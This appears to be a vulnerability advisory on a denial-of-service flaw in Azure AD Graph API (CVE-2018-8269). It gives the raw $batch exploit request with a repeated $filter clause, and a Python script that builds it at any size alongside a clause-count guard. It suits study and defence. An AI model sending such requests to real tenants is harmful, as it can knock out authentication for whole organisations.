Azure Active Directory Graph API
A vulnerability in Azure Active Directory Graph API could allow a remote authenticated attacker to make the service unavailable.
Azure Active Directory is Microsoft’s cloud service that provides identity and access management (IAM) services. It is used by many organizations to authenticate users in Microsoft Azure applications as well as on-premises applications.
Azure Active Directory Graph API is a REST-based interface that provides programmatic access to this service.
Many applications use this API to interact with Azure Active Directory. If the Graph API is unavailable for an organization, all the applications that depend on it will most likely be unavailable as well.
The vulnerability results from the service's dependency on the Microsoft.Data.OData library, which was vulnerable to a remote denial of service (see CVE-2018-8269).
The exploit consists of sending an OData batch request whose inner request carries a $filter parameter with many repetitions of the same clause, as in the following request (the `or` clause is repeated many times; the repetition is elided here):

POST https://graph.windows.net/<org id>/$batch?api-version=1.6 HTTP/1.1
Host: graph.windows.net
Authorization: Bearer XXXXX
content-type: multipart/mixed; boundary=RRR
Content-Length: 216

--RRR
Content-type: application/http
Content-Transfer-Encoding: binary

GET https://graph.windows.net/<org id>/users?$filter=city+eq+'a'+or+city+eq+'a'+or.... HTTP/1.1
accept: application/json;odata=minimalmetadata

--RRR--
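The following Python is an added example, not code from the original advisory. It builds the $batch request shown above with a parameterised number of repeated `or` clauses (so the Content-Length is computed rather than hard-coded), and pairs it with a coarse server-side guard that counts boolean operators in an incoming $filter and rejects oversized expressions. The guard, its threshold and all function names are assumptions for illustration; they are not Microsoft's fix for CVE-2018-8269.

```python
"""Build the Azure AD Graph $batch request from the advisory, and a simple
clause-count guard for $filter values. Added example; the guard threshold and
helper names are assumptions, not part of the original page."""
import re
from urllib.parse import quote_plus, unquote_plus

GRAPH_HOST = "graph.windows.net"
API_VERSION = "1.6"
BOUNDARY = "RRR"
CRLF = "\r\n"


def build_filter(repetitions, field="city", value="a"):
    """Return an OData $filter made of `repetitions` copies of the same
    comparison joined by `or`, e.g. "city eq 'a' or city eq 'a' or ..."."""
    if repetitions < 1:
        raise ValueError("need at least one clause")
    clause = f"{field} eq '{value}'"
    return " or ".join([clause] * repetitions)


def build_batch_request(org_id, token, repetitions):
    """Build the outer $batch POST carrying one inner GET /users?$filter=...
    Returns (request_line, headers, body); body is the multipart/mixed text."""
    # The advisory's request encodes spaces as '+' and leaves quotes as-is.
    encoded_filter = quote_plus(build_filter(repetitions), safe="'")
    inner_url = f"https://{GRAPH_HOST}/{org_id}/users?$filter={encoded_filter}"
    body = CRLF.join([
        f"--{BOUNDARY}",
        "Content-type: application/http",
        "Content-Transfer-Encoding: binary",
        "",
        f"GET {inner_url} HTTP/1.1",
        "accept: application/json;odata=minimalmetadata",
        "",
        f"--{BOUNDARY}--",
        "",
    ])
    headers = {
        "Host": GRAPH_HOST,
        "Authorization": f"Bearer {token}",
        "Content-Type": f"multipart/mixed; boundary={BOUNDARY}",
        # Computed from the actual body instead of the fixed 216 in the advisory.
        "Content-Length": str(len(body.encode("utf-8"))),
    }
    request_line = (f"POST https://{GRAPH_HOST}/{org_id}/$batch"
                    f"?api-version={API_VERSION} HTTP/1.1")
    return request_line, headers, body


def serialize(request_line, headers, body):
    """Render the request as raw HTTP text for inspection or a raw socket."""
    head = CRLF.join([request_line] + [f"{k}: {v}" for k, v in headers.items()])
    return head + CRLF + CRLF + body


# A coarse guard a reverse proxy could apply in front of an OData endpoint.
# Assumed mitigation for illustration only; not Microsoft's fix.
_STRING_LITERAL = re.compile(r"'[^']*'")
_BOOL_OP = re.compile(r"\b(?:or|and)\b", re.IGNORECASE)


def count_boolean_operators(filter_value):
    """Count `or`/`and` operators in a (possibly URL-encoded) $filter,
    ignoring anything inside quoted string literals."""
    decoded = unquote_plus(filter_value)
    without_literals = _STRING_LITERAL.sub("''", decoded)
    return len(_BOOL_OP.findall(without_literals))


def filter_within_limit(filter_value, max_operators=50):
    """True if the $filter carries at most `max_operators` boolean operators
    (the 50 is an arbitrary assumed threshold)."""
    return count_boolean_operators(filter_value) <= max_operators


if __name__ == "__main__":
    line, hdrs, body = build_batch_request("<org id>", "XXXXX", 3)
    print(serialize(line, hdrs, body))
    print("accepted:", filter_within_limit(build_filter(3)))
    print("accepted:", filter_within_limit(build_filter(1000)))
```

Running the module prints the three-clause form of the advisory's request; raising `repetitions` reproduces the long `$filter` the advisory describes. The guard operates on the decoded inner `$filter` only, so a deployment would also have to unpack each sub-request of a `$batch` body before applying it.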